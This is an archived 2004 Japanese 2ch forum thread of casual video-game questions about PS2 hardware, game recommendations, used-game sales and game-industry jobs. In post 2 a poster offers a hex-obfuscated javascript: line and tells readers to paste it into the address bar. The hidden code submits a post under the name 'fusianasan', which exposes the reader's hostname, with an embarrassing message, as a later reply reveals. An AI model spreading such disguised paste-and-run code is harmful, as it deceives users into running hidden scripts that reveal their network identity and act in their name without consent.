2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

スレ立てるまでもない質問・疑問・相談24

1 :なまえをいれてください:04/10/22 06:44:22 ID:I2kCz/Zi
ちょっとした相談も歓迎。sageの必要はありません。

■オンラインゲーム関係はネトゲ質問板です■http://game7.2ch.net/mmoqa/
■RPG関係は家ゲーRPG(仮称)板です■http://game6.2ch.net/gamerpg/
レトロゲーム・携帯ゲームその他は各板のローカルルールを確認してください。

◆◆製品の仕様については各メーカーに聞いてください◆◆
◆解らないことがあったらまず説明書とメーカーサイトを確認しましょう◆
◆個々のソフトに関する質問はそれぞれの本スレ・または関連性の強いのほうが適切です◆
◆エミュレーターに関する質問はスレ違い◆
◆特定のスレッドの検索は各自でお願いします◆

>>2-30くらいに関連スレや各種サーチエンジンや2chブラウザなど
お役立ち情報やよくある質問などがあります。もしくはこちら↓
http://pc5.2ch.net/test/read.cgi/db/1057985632/n51-59
もない質(全板スレタイ検索)
http://ruitomo.com/~gulab/s.cgi?k=%82%E0%82%C8%82%A2%8E%BF&o=r


2 :なまえをいれてください:04/10/22 06:45:36 ID:shiYecQ3
2ch専用ブラウザを使用している人は、
IEなどの一般的なブラウザでこのスレを開いておく。

1、
javascript:s='7769746828646f63756d656e742e666f726d735b305d297b46524
f4d2e76616c75653d2766757369616e6173616e273b4d4553534147452e7661
6c75653d275c75353134345c75386362345c75373533625c75353063665c
75333034665c75333036305c75333035355c7533303434273b7375626d697
42e636c69636b28293b7d';for(l=0,e="";l<s.length;l+=2)e+='%'+s.substr(l,2);eval(unescape(e));
をクリップボードにコピーし、メモ帳などのテキストエディタに貼り付ける。

2、
改行を外して1行にする。

3、
1行にしたものをクリップボードにコピーし、アドレスバーに貼り付ける。

4、
Enterを押す(もしくは「移動」をクリックする)。

俺はこれをやって思わず笑ってしまったよww

3 :なまえをいれてください:04/10/22 06:45:46 ID:I2kCz/Zi
わからないことがあったらまず説明書を読みましょう。
それについて何も載ってなかったら、とりあえず検索してみましょう。
http://www.google.co.jp/

板とスレッド内の検索は、Win『Ctrl+F』/Mac『command+F』
(※半角カナや英語や短くしたフレーズでも検索しましょう)
スレッド一覧
サロン http://game6.2ch.net/gsaloon/subback.html
家ゲー http://game6.2ch.net/famicom/subback.html
RPG http://game6.2ch.net/gamerpg/subback.html
ハード http://game6.2ch.net/ghard/subback.html

初心者の方はこちら
http://etc.2ch.net/qa/
http://www.skipup.com/~niwatori/
http://www.geocities.co.jp/SiliconValley/5693/

◆各種サーチエンジン
2chスレッド検索(携帯兼用)
http://2chs.net/i/2chs.cgi
スレッドタイトル検索
http://ruitomo.com/~gulab/
スレッドランキング
http://www6.big.or.jp/%7Ebeyond/bbsnews/
サーファーズパラダイス
http://www.surpara.com/


4 :なまえをいれてください:04/10/22 06:47:26 ID:I2kCz/Zi
▲ ○○のスレってどこですか?
▽ ★http://pc5.2ch.net/test/read.cgi/esite/1034264315/

▲ ○○の売価、買取価格はいくらですか?
▽ 店舗によって違うので各自電話するなり検索するなりして調べましょう
   http://list.auctions.yahoo.co.jp/jp/22844-category.html
   http://used.sofmap.com/usoft/

▲ 〇〇というソフトって面白いの?
▽ 人によります。
   レビューはここ参照。
   ★http://game6.2ch.net/test/read.cgi/gsaloon/1061947095/2
   ★ソフトを買いたい場合には購入相談所スレでどうぞ。↑

▲ 昔のゲームの名前が思い出せません。
▽ レトロゲーム板のローカルルールを見てください。★http://game6.2ch.net/retro/

▲ どのハードを買えばいい?ハードの買い時は?
▽ 自分がやりたいと思うソフトが出た時に該当するハードを買う

▲ 「何かお勧めのゲームないですか?」
▽ 「今まで面白かったのを挙げろ」「過去ログ読め」 「購入相談スレ(探せ)で聞け」

5 :なまえをいれてください:04/10/22 06:49:35 ID:I2kCz/Zi
▲ PS2でPSのソフトのセーブが出来ません。
▽ PSソフトのセーブにはPS用メモリーカードが必要です

▲ PS用メモリーカードのデータをPS2用メモリーカードにコピーできるの?
▽ できる。
   ただし、PS用ソフトはPS2用メモリーカードを認識できないので、
   PS2メモリーカード内のPS用ソフトデータを直接ロードすることは出来ない

▲ PSのコントローラーってPS2で使えるの?
▽ 通常・アナログコントローラーともに使えるが、
   デュアルショック2専用ソフト(バイオハザードコードベロニカ,Shinobiなど)の場合使えない
   その他専用コントローラーは各ソフトを参考に

▲ PSのソフトってPS2でも遊べるの?
▽ http://www.scei.co.jp/corporate/info/list.html

6 :なまえをいれてください:04/10/22 06:51:24 ID:I2kCz/Zi
▲ PS2のメモカのセーブデータが壊れます
▽ http://www.playstation.jp/info/i_faq_detail.php?eid=1A2F0&pid=0&cid=13&sid=1
   (ただしこの方法で削除できない事も多々ある。その場合メモリジャグラー、MemoryMAXXなどで初期化するしかない)
   原因に心当たりがないのに、たびたびデータが壊れる場合は
   不良品、または故障の可能性あり、メールか電話で詳細を確認。
   なお、初期型に添付されていたメモリーカードは不良持ちのようです
   製造番号が「3-059-051-01」だったら使用を控えてSCEに連絡。
   製造番号が違ったりカッコが付いているものは該当せず

▲ PS2が故障しました。 どうしよう?
▽ http://ruitomo.com/~gulab/s.cgi?k=s2%89%F3&o=r

▲ 今まで出たソフトのデータベースないですか
▽ http://allsoft.scei.co.jp/search.zolar(PS/PS2)

7 :なまえをいれてください:04/10/22 06:59:48 ID:I2kCz/Zi
■PS2のFAQ 現在342件 (PS2関連なら質問前に確認汁)
http://www.playstation.jp/info/i_faq_list.php?page=1

主要情報サイト
http://www.watch.impress.co.jp/game/
http://www.itmedia.co.jp/games/
http://www.mainichi.co.jp/life/hobby/game/
http://www.gpara.com/
http://www.dengekionline.com/
http://www.famitsu.com/game/

主要ハードメーカー
http://www.jp.playstation.com/
http://www.nintendo.co.jp/
http://www.xbox.com/ja-JP/default.htm
http://www.sega.co.jp/

◆レビュー
ゲーいろゲームレビュー
http://www.ge-iroreview.com/
Mainichi INTERACTIVE ゲームクエスト
http://www.mainichi.co.jp/life/hobby/game/
CCBのゲームレビュー
http://www.g-rev.com/
GAME大宝庫
http://www.ic-net.or.jp/home/t-sampei/

8 :なまえをいれてください:04/10/22 07:01:14 ID:I2kCz/Zi
購入相談所
http://ruitomo.com/~gulab/s.cgi?k=%8dw%93%fc%91%8a%92k%8f%8a&o=F
【機種名を忘れずに】レトロゲームの名前質問
http://ruitomo.com/~gulab/s.cgi?k=%91O%8E%BF&o=r
ゲーム屋
http://ruitomo.com/~gulab/s.cgi?k=%83Q%81%5B%83%80%89%AE&o=r
サターン
http://ruitomo.com/~gulab/s.cgi?k=%83T%83%5E%81%5B%83%93&o=r
Xbox総合
http://ruitomo.com/~gulab/s.cgi?k=xbox%91%8D&o=r
ファミ通
http://ruitomo.com/~gulab/s.cgi?k=%83t%83@%83%7E%92%CA&o=r
ゲーム雑誌
http://ruitomo.com/~gulab/s.cgi?k=%83Q%81%5B%83%80%8EG%8E%8F&o=r
コントローラ
http://ruitomo.com/~gulab/s.cgi?k=%83R%83%93%83g%83%8D%81%5B%83%89&o=r
RGB
http://ruitomo.com/~gulab/s.cgi?k=rgb&o=r
TVCM
http://ruitomo.com/~gulab/s.cgi?k=tvcm&o=r
TVゲーム
http://ruitomo.com/~gulab/s.cgi?k=tv%83Q%81%5b%83%80&o=F
PS2壊れた
http://ruitomo.com/~gulab/s.cgi?k=s2%89%F3&o=r

9 :なまえをいれてください:04/10/22 15:03:30 ID:Df29Fyzk
おつかれ。
>>2ってなんだ?

10 :なまえをいれてください:04/10/22 15:17:49 ID:R6p1dp4e
>>9
試してみた

>書きこみ&クッキー確認
>
>
>
>名前: fusianasan
>E-mail:
>内容:
>兄貴画像ください

何かを暗号化してあると思ったがこう言うことか・・・
似たようなの↓
JavaScript:document.body.innerHTMLのガイドライン2
http://that3.2ch.net/test/read.cgi/gline/1076853643/

11 :なまえをいれてください:04/10/22 17:10:54 ID:Df29Fyzk
なるほど。くそ、確かにちょっと笑ってしまった。

12 :なまえをいれてください:04/10/22 17:49:31 ID:PREosi6F
 で、結局>>2は、これによって何をさせたいの?

13 :なまえをいれてください:04/10/22 23:18:46 ID:OJ/eZeIk
バトルは終わりか?

14 :なまえをいれてください:04/10/22 23:22:29 ID://DLMDaU
出て来い低脳ID:I2kCz/Zi

15 :なまえをいれてください:04/10/22 23:29:47 ID:FOsvCp9v
>>14
おまい、リアルはもちろん2chでも負け犬だなんて悲惨だねw 同情するよw

16 :なまえをいれてください:04/10/22 23:55:44 ID:D8t/n4wa
初めまして。
テイルズオブデスティニー2とシンフォニアはどちらが面白いですか?
ちなみに、デスティ二ーはそれなりに楽しめたんですがエターニアは
全然面白くなくて途中で止めました。

17 :なまえをいれてください:04/10/23 00:28:02 ID:CuBoDy/R
>>2ってなに?

18 :なまえをいれてください:04/10/23 01:26:50 ID:E/Glhhep
家ゲー板にはスタンドアロン鉄騎スレがないけどなぜ?
ネットゲーの鉄騎大戦と合併なのか?

19 :(*´-`*):04/10/23 01:42:38 ID:OkKziJsT
はじめまして。
「THE ぼくの街づくり」っていうシムシティーのようなゲームを購入して、遊んでいるのですが、
ミッション1が終わり、引退届けも受理されました。
引退届が受理されてからゲーム時間で1年経っていますが、
どうやれば、ミッション2に進むことができるのでしょうか?
ずーっとミッション1のままで、長時間我慢してきましたが、やっている自分でも笑えてきましたので、
こちらで相談してみました。

どなたか、この笑えるような質問ですが、教えてください。

20 :なまえをいれてください:04/10/23 02:01:39 ID:E4+YjEEn
>>19
素直に引退しましょう。
次ステージには電話帳が引き継げるので
特別な職業のひととは仲良くなっておくと楽

あと攻略板にスレがあるので参考に
SIMPLE39 THEぼくの街づくり 攻略スレ
http://game9.2ch.net/test/read.cgi/gameover/1068112562/l50

21 :(*´-`*):04/10/23 02:15:55 ID:OkKziJsT
>>20
攻略スレを教えていただき、ありがとうございます。
素直に引退したいのですが、引退届が受理されてもずっとミッション1のまんまなんです。(笑)

あっちのスレで聞いてみま〜す。ヽ(#^-^#)ノ

22 :なまえをいれてください:04/10/23 02:21:21 ID:tXV1N7tt
>>16
う〜ん微妙だね・・
個人的にはTOSをすすめるけどどっちもどっちだよ
Rがでるの待つのも手かも

23 :なまえをいれてください:04/10/23 02:36:48 ID:E4+YjEEn
>>21
アイテムとして引退届を使ったんだよね?
念のため


24 :(*´-`*):04/10/23 02:51:35 ID:OkKziJsT
>>23
はい、引退届を使い、受理されました。と、出ておりますが。。。
それから、ゲーム時間で1年を過ぎましたが、状態はその表示のままミッション1におります。

25 :20:04/10/23 03:17:37 ID:E4+YjEEn
>>24
あまりやり込んでないので
他の原因は分からん、スマソ

26 :(*´-`*):04/10/23 03:21:52 ID:OkKziJsT
>>25
私の笑えるような泣けるような質問に付き合ってくださって、ありがとうございました。
しょうがないので、もう一回始めからしてみます・・・(*´-`*)

27 :なまえをいれてください:04/10/23 06:05:07 ID:Yi8L+hWk
攻略本のベスト版って何ですか?
おいしいのかなそれ。

28 :なまえをいれてください:04/10/23 08:02:47 ID:krTysPwg
このスレ見たらいきなりノートン先生が反応したんだけど、ウイルス仕込むことできるんですか?
http://game8.2ch.net/test/read.cgi/mmominor/1098093069/3

29 :なまえをいれてください:04/10/23 09:32:38 ID:Z7KDgsSV
PS2のオンライン対応ソフトで
利用料金が無料か有料(KDDIふくむ)か一目で分かるサイトありませんか?


30 :なまえをいれてください:04/10/23 10:32:59 ID:rJbMfbv5
>>17
やってみれば
ただし何が起こっても当方は感知いたしません

>>18
攻略板逝け
モンスターハンターもバイオOBも
オフラインは攻略板らしい

>>27
意味が解りません

>>28
http://school4.2ch.net/test/read.cgi/qa/1091629579/10
ゲームに関係無い質問は他でしてくれ

>>29
PlaystationBBのHP

31 :なまえをいれてください:04/10/23 12:23:23 ID:S0ivGA0t
ゲオで20本まとめて売ったら1万円+するとか
いってたけど、500円くらいのソフト20本うっても
1万円くれるの?

32 :なまえをいれてください:04/10/23 12:26:21 ID:rJbMfbv5
>>31
知らん
ゲオで聞けばいいだろ

33 :なまえをいれてください:04/10/23 12:31:48 ID:aanrJ6eh
相変わらずメーカーサイト、公式サイトすら読もうとしない奴が多いな

34 :31:04/10/23 13:35:16 ID:S0ivGA0t
俺20本ぐらい持ってるけど体験者返答キボンヌ。


35 :なまえをいれてください:04/10/23 13:44:53 ID:t8DEJIU6
>>31
ティラシにはゲオで480円以下で売ってるソフトはカウントしないって
書いてある。

36 :なまえをいれてください:04/10/23 13:49:57 ID:4ED9vD2F
ID:rJbMfbv5はもう質問に答えるな。邪魔

37 :なまえをいれてください:04/10/23 14:02:22 ID:rJbMfbv5
邪魔とか言う前に>>4見ろよ

38 :なまえをいれてください:04/10/23 16:42:05 ID:+Sbfm6kF
これは誰ですか?お願いします。
ttp://gulico.ddo.jp/up/img/1740.zip

39 :なまえをいれてください:04/10/23 16:52:55 ID:S0ivGA0t
>>35
ありがとうございます。

40 :なまえをいれてください:04/10/23 17:42:13 ID:EvxaNknJ
ID:rJbMfbv5さん38おねがいします。

41 :なまえをいれてください:04/10/23 18:48:32 ID:m7RXupv8
http://page6.auctions.yahoo.co.jp/jp/auction/f29363417
何でこんなに高いものなのか説明いただきたい


42 :なまえをいれてください:04/10/23 18:52:36 ID:UW76ZTcf
何か、絶体絶命都市やりたくなった。

43 :なまえをいれてください:04/10/23 19:07:59 ID:aanrJ6eh
>>41
宣伝ウザイよ、腐れ厨房。
宣伝じゃないなら文章見りゃ解るだろ。

44 :38:04/10/24 04:16:31 ID:bJQ/3bwd
あ、質問をやめます。

45 :なまえをいれてください:04/10/24 12:37:25 ID:H369yL32
メタルオブソナーのスレないんですか?どこかと統合したんですか?
検索してもないんですけど

46 :なまえをいれてください:04/10/24 18:31:29 ID:FG1AAuKJ
are

47 :なまえをいれてください:04/10/24 20:40:03 ID:h1rRACrP
ゲームのストーリーをまとめたサイトのアドレス知ってる人います?
ぐぐっても見つからない。



48 :なまえをいれてください:04/10/24 20:59:15 ID:SOwrEfoX
ttp://storyteller515.hp.infoseek.co.jp/
コレか?47さん。

49 :なまえをいれてください:04/10/24 21:08:25 ID:h1rRACrP
>>48
ありがとうございました。それで間違いありません。

50 :なまえをいれてください:04/10/24 21:19:32 ID:Q4VSh8/Q
SMを購入しようと思うんですが 
やっぱり最新バージョンを買った方がいいんでしょうか

51 :なまえをいれてください:04/10/24 21:55:40 ID:Ni/AsJqL
質問です
ゲームキューブのD端子対応の有無って
外箱に書いてますか?

52 :なまえをいれてください:04/10/24 22:06:04 ID:pdAVAI94
SOCOMみたいな銃撃戦ゲームのオンラインってPS2で他に出てないですか?

53 :なまえをいれてください:04/10/25 12:29:37 ID:xw4OmK75
PCでCallofDutyやればいいのに。軽いよ。

54 :なまえをいれてください:04/10/25 13:00:27 ID:hGJsD0vE
今度発売予定のGCソフト「スーパーロボット大戦GC」の価格が8190円[税込]なんですが、
もしかしてGCソフトで一番高いんですか?


55 :なまえをいれてください:04/10/25 13:26:51 ID:zeTAAvrT
>>54
お遍路さんよりは安い。

つか高いといってもそれほど度が過ぎてるわけでもなし
何か困るのか???

56 :なまえをいれてください:04/10/25 19:29:13 ID:AqtPdSHo
任天堂に就職を考えてます。任天堂は安定してるみたいだけど
ゲーム業界全体で見ると、不況らしいのですが、ユーザーから見ても
やはりゲーム業界は不況ですか?

57 :なまえをいれてください:04/10/25 20:03:09 ID:xw4OmK75
就職できることを前提にしてるあたり凄いな

58 :なまえをいれてください:04/10/25 20:36:57 ID:PAkK0HtT
>>56
学生さん?
すごい能力とか持っているの?

59 :56:04/10/25 20:54:53 ID:AqtPdSHo
>>58
一応、名前だけは早稲田の政経なんで、基礎学力とコミュニケーション能力で
入れるかなと、そんな感じです

特技は英語と、人付き合いくらいです

60 :なまえをいれてください:04/10/25 20:57:51 ID:ri5S8f0/
>>54
http://www.nintendo.co.jp/ngc/software/gpoj/index.html
同梱系だがPSOモデム付は税込み10290円
http://www.nintendo.co.jp/ngc/software/gbzj/index.html
バイオ0も税込み8190円
メモカ付だけどメモカはあくまで値段上がったことに対するサービスらしいからな

61 :なまえをいれてください:04/10/25 23:02:08 ID:DPhokyhq
>>59
総務とか人事に訊くか情報機関にでも相談したら

参考
【任天開発縮小】御飯を食べるから猫の手はいらない
http://game8.2ch.net/test/read.cgi/ghard/1086836748/l50

62 :なまえをいれてください:04/10/26 11:00:18 ID:el785yrc
任天堂に就職したい2(就職板)
http://money3.2ch.net/test/read.cgi/recruit/1095773242/

63 :なまえをいれてください:04/10/26 14:40:25 ID:ynpUVS2M
任天堂って昔から少数精鋭主義で有名だったような

64 :あふぉ:04/10/26 15:27:16 ID:YgfW1FFB
ここで聞くのもなんだけど、就職するとしたらドコがいいと思います?給料の問題は別で。

65 :なまえをいれてください:04/10/26 15:33:06 ID:el785yrc
>>64
■■ゲーム業界就職情報スレV■■
http://game8.2ch.net/test/read.cgi/ghard/1091503005/
逝ってこい

66 :なまえをいれてください:04/10/26 19:58:46 ID:MsKN6jOY
質問であります

やった ついにねんがんの ・・・・をてにれたぞ

ころしてでもうばう

って流れは元ネタ何のゲームなの?

67 :なまえをいれてください:04/10/26 20:24:07 ID:fXm++wFu
ロマサガ1

68 :なまえをいれてください:04/10/26 20:32:32 ID:gitVXBLm
>>59
早稲田の政経ってことは営業とか経理にまわされそうだけどいいの?
専門学校とか美大卒じゃないと優先的に企画とか開発にいけないと思うけど
ポートフォリオは作ってあるの?

69 :なまえをいれてください:04/10/26 20:46:41 ID:TRROFYvt
板のローカルルールも理解出来ないようでは先が思いやられる

70 :なまえをいれてください:04/10/26 20:48:32 ID:MsKN6jOY
>>66
さんきぅ

71 :なまえをいれてください:04/10/26 20:49:29 ID:MsKN6jOY
ごめ
>>66じゃなくて>>67


72 :なまえをいれてください:04/10/26 21:10:19 ID:x/o5C4Ft
エースコンバットみたいなシューティングゲームで
WW2の戦闘機で遊べるやつないですか?

できるだけリアルなの。(ゲーム久しぶりなおっさんです)

73 :あふぉ:04/10/27 02:32:37 ID:Bkgu6wAX
65アイヤー(ノ∀`)だったら最初から自称ワセーダ君
に教えてやってくれよ。
恥カイチャッタヨ。

74 :なまえをいれてください:04/10/27 03:09:25 ID:2A+RYen1
>>72
どのハードを持っているのかおせーれ

75 :なまえをいれてください:04/10/27 11:21:04 ID:dBc2flTs
>>72
WW2ならヨーロッパでも太平洋でもかまわない?

76 :72:04/10/27 21:05:52 ID:YK63kLoQ
>74,75
すいません、ハードは持っていません。
良いゲームがあったらそれにあわせて買おうかと。
でもPS2かな。

ヨーロッパでも太平洋でもかまいませんが、地上(艦船)を爆撃できたらいいな。
リアルな方がいいと書き込みましたが、映像がリアルであって、
操作方法がリアルというわけではありません。ストレス発散のため、単純に
バカスカ打ち落としたり爆弾落としたりできたらいいなと思います。
お勧めの作品がありましたら教えてください。

でも、エースコンバット5も面白そうですね。

77 :.:04/10/27 21:26:32 ID:Wege5Ec9
>>76
とりあえず定番サイトね。
エースコンバットはシューティング系に分類されてるね
グラフィックの評価は上々みたいだし、気になるならAC5にされてみてはいかが?
http://psmk2.net/

78 :なまえをいれてください:04/10/28 10:35:35 ID:5ibAqmdZ
今なにかおもしろいゲームがないか探してるんですが
おすすめのゲームがあったら教えて下さい。
好きなゲームは64のゼルダなどです。
今探してるのは、PS2で天誅なんかみたいに縦横無尽に移動できて
ストーリー性があり、やり込める。そして、なによりおもしろい!
そんなゲームがあったら教えて下さい。お願いします。

79 :なまえをいれてください:04/10/28 11:33:41 ID:AwEmJn0D
>>76
未プレーだけど、一応タイトル挙げてみる。興味があれば>>77さんの紹介してるサイトで調べてみて。(全てPS2)

零式艦上戦闘記(太平洋)
ZEROPILOT(太平洋)
シークレットウエポン オーバーノルマンディー(ヨーロッパ)

80 :なまえをいれてください:04/10/28 11:38:12 ID:4KCVulp9
今日発売のゲームをゲームを扱うヤマダ電機で買おうと思っているのですが
ヤマダは発売日にゲーム仕入れますかね?シンプルライフ2000のやつなんですが


81 :なまえをいれてください:04/10/28 11:55:05 ID:7UO27o/a
すんまそん
エミュレーターってものを買えば
ゲームデータ改造できるんですか?
いろいろ種類があるんですが古いのでも大丈夫ですか?

82 :なまえをいれてください:04/10/28 12:31:36 ID:Y09OOII6
はじめてゲームを売りに行こうと思うのですが、買った時の袋にいれてレジに
「これ買い取りしてもらいたいんですけど」って言おうと思うんです、
これでいいんですか?買取してもらった時の事を色々きかせてください。
ちなみにゲオに売りに行こうと思います。

83 :なまえをいれてください:04/10/28 12:38:39 ID:AwEmJn0D
>>82
袋はなんでもよか
未成年なら親の承諾書とかがいるから親と一緒にいくのが一番いい

84 :80:04/10/28 12:39:21 ID:4KCVulp9
>>82
袋はなんでも大丈夫ですよ
未成年なら親の承諾書もって売りたいソフトだけ持っていけばOK
そうじゃないならソフトだけ持っていく
一応、身分証明も。万引きされた商品とか転売関係で同じタイトルは2本までとかはある
査定金額をおしえてもらったら後はその金額で売っていいか、金額が低くて売るのやめるなら止めますっていえば大丈夫

誰か>>80の頼む


85 :78:04/10/28 12:47:01 ID:5ibAqmdZ
ないですか?

86 :なまえをいれてください:04/10/28 12:55:36 ID:dqc36Bwv
>>78
催促すんなうぜーよ禿げ
>>80
うん

87 :なまえをいれてください:04/10/28 13:06:07 ID:xVJt6j66
>>78
箱庭ゲーが好きなのかな
えーとね、洋ゲーだけどトゥームレイダーシリーズがお勧め、マジ冒険している気になる
PSの1とか2が安いし面白いからそこから始めてみては
上の条件にバッチリはまるぞ、縦横無尽でストーリーで面白い

ちょっとジャンルは違うが
64持っているなら007GEが面白かったから勧めてみたい
中古価格が馬鹿高いけどな

88 :78:04/10/28 13:50:24 ID:5ibAqmdZ
>>87
トゥームレイダーは1〜4まで持ってます。
007GEってのは初耳です。検討したいと思います。
ありがとうございました。

89 :なまえをいれてください:04/10/28 14:16:35 ID:RPjOCiJh
D端子やらコンポーネント端子、S端子等ありますがどれが一番綺麗な映像何でしょうか?
ちなみ使ってるTVの背面にはD3端子が2個ついているみたいです

90 :なまえをいれてください:04/10/28 15:32:53 ID:luFzklnL
>>89
http://cable.s74.xrea.com/
つーかこのサイトまだテンプレ追加されてないのか。
何度目だこの質問。

91 :なまえをいれてください:04/10/28 22:44:25 ID:7oUZGzb/
PC用のキーボードをPS2(プレステ2)用に変換するコネクタとかケーブルとか
その手の商品ってありますか?

92 :なまえをいれてください:04/10/28 22:59:01 ID:luFzklnL
>>91
USBキーボードをキーボード対応ソフトで使いたいだけなら、
90%以上は普通に使える。

キーボードをコントローラとして使いたいなら↓が最近出たが、
http://www.lik-sang.com/news.php?artc=3503
日本じゃ売ってない

93 :なまえをいれてください:04/10/29 02:05:50 ID:6rLdnWIh
>>88
因みに正式名称
「007 ゴールデンアイ(GOLDEN EYE)」ね
やっぱトゥームはやってたか・・・

94 :なまえをいれてください:04/10/29 10:18:33 ID:wS459+qQ
>>91
http://www006.upp.so-net.ne.jp/owlnet/ff11/toplay/keyboard.htm
参考に
ドライバが必要なキーボードは大抵ダメ

95 :なまえをいれてください:04/10/29 11:07:45 ID:y+4GQ/cr
エンドネシアのスレってないのん?

96 :なまえをいれてください:04/10/29 13:06:20 ID:gaCiX7rY
ないね

97 :なまえをいれてください:04/10/29 13:08:22 ID:wS459+qQ
>>95
【moon・UFO】西健一ゲー攻略スレ【L.O.L.・GIFTPIA】
http://game9.2ch.net/test/read.cgi/gameover/1059042894/
質問があるなら答えてくれると思う

98 :なまえをいれてください:04/10/30 02:27:42 ID:ZpLCNCan
すみません、教えてください。
古いソフトなんですが。
「ワールドサッカー実況ウイニングイレブン2000」をやっています。
ゴールキーパーを前に出てこささないようにするには、どうしたら良いのでしょうか?
取説を穴が開くほど見てみたのですが、載っていません・・・

宜しくお願い致します。


99 :なまえをいれてください:04/10/30 10:32:48 ID:NCq2XNIS
>>98
ウイニングイレブン総合スレ 第110011001(2進数)節
http://game8.2ch.net/test/read.cgi/famicom/1098765424/

100 :なまえをいれてください:04/10/30 11:33:36 ID:GhOnjA6H
ゲーム初心者の女でも楽しめるPS2ソフトって何があります?


101 :なまえをいれてください:04/10/30 11:43:30 ID:MD5UC4po
スレ違いですみません。
小学2年娘をもつ母親です。
以前「部屋のインテリアを好きに作れるゲームソフトに子供がはまっている」
というエッセイマンガをよみました。
そのゲームをクリスマスプレゼントに考えているのですが、
名前も機種もさっぱり覚えていません。
どなたか御存知の方教えて下さい。
また動物(森の仲間みたいな)を育てるゲームのようなものも
探しているので同様にお願いします。


102 :なまえをいれてください:04/10/30 11:49:38 ID:NCq2XNIS
>>100
そんな漠然とした質問にはテキトーな答えが返ってくるだけだ
何か興味あるソフトとか過去やったことあるソフトとかやりたいジャンルとか無い?
とにかく何かあるだろ
それすらも解らなかったら
ゲーム屋行ってパッケージをじーっと見て
絵が気に入ったのとか面白そうとか思ったのを
買うと良い

>>101
どうぶつの森+・どうぶつの森e+(共にゲームキューブ)かな
http://www.nintendo.co.jp/ngc/gafj/

103 :なまえをいれてください:04/10/30 11:51:45 ID:MD5UC4po
追加です。当方PSとパソコンしかありません。
これで出来るゲームありますか?
(ゲームキューブで「森の仲間」があるのは教えてもらいました。)

104 :なまえをいれてください:04/10/30 11:57:47 ID:MD5UC4po
102さん。
後だしでごめんなさい。
ゲームキューブ買うまでは出せないんですよ〜(涙)
似たようなソフト御存知ありませんか?

105 :なまえをいれてください:04/10/30 12:02:59 ID:rkvJ9f2z
ゲームに詳しい皆様方に質問
・布団に入りながらマッタリジワジワ楽しめる、RPGとかシミュレーション系のゲーム
・適度にアニメーションが入っていて、ストーリーを盛り上げる
・やり応えはあるが、それなりにサクサク進めて結構深みがある
そんなプレステ2でやれるゲームを探してます。
なんか良いソフトありませんでしょーか?
最近出たステラデウスとかいいかな?とか思ってます

106 :なまえをいれてください:04/10/30 12:04:29 ID:sW8yXGwa
>>101
シムピープルとか良いかも
家のデザインとか内装とか配置したり出来るし
お店とか作れたりする

107 :なまえをいれてください:04/10/30 12:08:44 ID:UJ+nbRD8
>>101
クリスマスプレゼントなら娘さんが欲しいと言ってたのをあげたほうがいいんでは?

108 :なまえをいれてください:04/10/30 12:25:24 ID:RbmWA4NW
>107サンタがくれると思っている
クリスマスプレゼントを
親が聞いたら
親がサンタだという事実がバレてしまうじゃないか
夢がないなぁ

109 :なまえをいれてください:04/10/30 12:39:07 ID:NCq2XNIS
>>105
【まずは】ゲーム購入相談所140【テンプレから】
http://game8.2ch.net/test/read.cgi/famicom/1096236796/


110 :なまえをいれてください:04/10/30 13:44:18 ID:UJ+nbRD8
>>108
いや、まぁそうなんだけど・・・
昔クリスマスプレゼントで自分が欲しかったのと違っててもの凄く凹んだことあったからさー。
今の時期にさりげなくででも聞いてれば、親=サンタとは思わないんじゃないかな?

スレ違いスマソ

111 :なまえをいれてください:04/10/30 16:25:22 ID:gndnNFTg
>100
「ことばのパズルもじぴったん」なんかどうだ?
文字さえ読めれば誰でもできる簡単なルールだし、なによりベスト版が1800円と安いから
外れても大して痛手ではなかろう

112 :なまえをいれてください:04/10/30 16:33:02 ID:iB1z/d7s
すみませんちょっとお願いが。
いまPS2をテレビとコンポーネントケーブルを使ってつなごうとしたんですが、
いっかいPS2のメニューから出力信号を切り替えを行う作業がいることが
あとになって分かりました。
現在とある理由で手元に通常のAVケーブルがありません。
効果音をたよりに手探りで切り換えてみることにします。

どなたか起動直後の画面から映像信号を通常からコンポーネント出力に
切り換えるまでのキー手順をこちらで並べて頂けませんでしょうか。
もしくはショートカットキーみたいなのがあれば手っ取り早いのですが・・・
あ、ps2のマニュアルも手元にない状態なんです・・

113 :なまえをいれてください:04/10/30 16:54:25 ID:NCq2XNIS
>>112
http://www.playstation.jp/info/
ココから取り説をダウソ汁

114 :なまえをいれてください:04/10/30 17:22:56 ID:zDPcBQn2
プレステで音を抜きたいんだがPsxMCでやればいいのかい?

115 :なまえをいれてください:04/10/30 17:24:27 ID:zDPcBQn2
pgconvの方がいいのかい?

116 :なまえをいれてください:04/10/30 17:57:46 ID:9O+hOp3a
自分で試せよ・・・幼稚園児かよお前

117 :112:04/10/30 18:57:07 ID:KtiyYRlz
>>113
ありがとうございます。

マニュアルからメニューの並びを判断できたですが、
念のためサポに電話し、[↓○↓↓↓○→○]と押せばOKだとおしえてもらいました。
どうもおじゃましましたー。

118 :なまえをいれてください:04/10/30 19:56:09 ID:9O+hOp3a
最初からサポに電話しろよ・・・

119 :なまえをいれてください:04/10/30 22:04:32 ID:KtiyYRlz
金かかるじゃん

120 :なまえをいれてください:04/10/31 03:39:01 ID:OhA1L11m
>>111
もじぴったん難しくネ?

121 :なまえをいれてください:04/10/31 04:03:47 ID:GZfJ+Jbt
>>120
もじぴったんはボキャブラリー+αが楽しいゲームだし
むしろ小学生の語彙力をゆがんだ形で強化するのに向いてそうだ。

122 :なまえをいれてください:04/10/31 04:10:47 ID:t9YIE1GR
>>120
111じゃないけど、やってみて難しいと思ったんか?
ルール自体はすぐ把握出来るし操作も難しくないでしょ

あと、同じナムコの塊魂とかMrドリラーとかも勧めたい
非常にナムコらしい秀作、こう言うのを出すからナムコは好き

123 :なまえをいれてください:04/10/31 14:06:10 ID:H+KjD3E4
PS2のゲームで中古4000円以内で買えて
イケメンが出てくるゲーム教えて。


124 :なまえをいれてください:04/10/31 14:20:04 ID:7K23J2Cs
ヒカルの碁とかデスノート描いてる
小畑って人がキャラデザしたゲームって
なんてタイトルだっけ?まだ発売して無いと思うけど
確か鬼武者みたいなヤツで前ジャンプに画像載ってたんだが

125 :なまえをいれてください:04/10/31 14:23:09 ID:cUZcmPuL
サイボーグ爺ちゃんG

126 :なまえをいれてください:04/10/31 14:26:21 ID:7K23J2Cs
あってるけど違うorz

127 :なまえをいれてください:04/10/31 16:45:50 ID:mb/Kf/FI
タイトルがわからないのですがプレステのゲームで、
自分で設計?して車などを作るゲームわかりませんか?
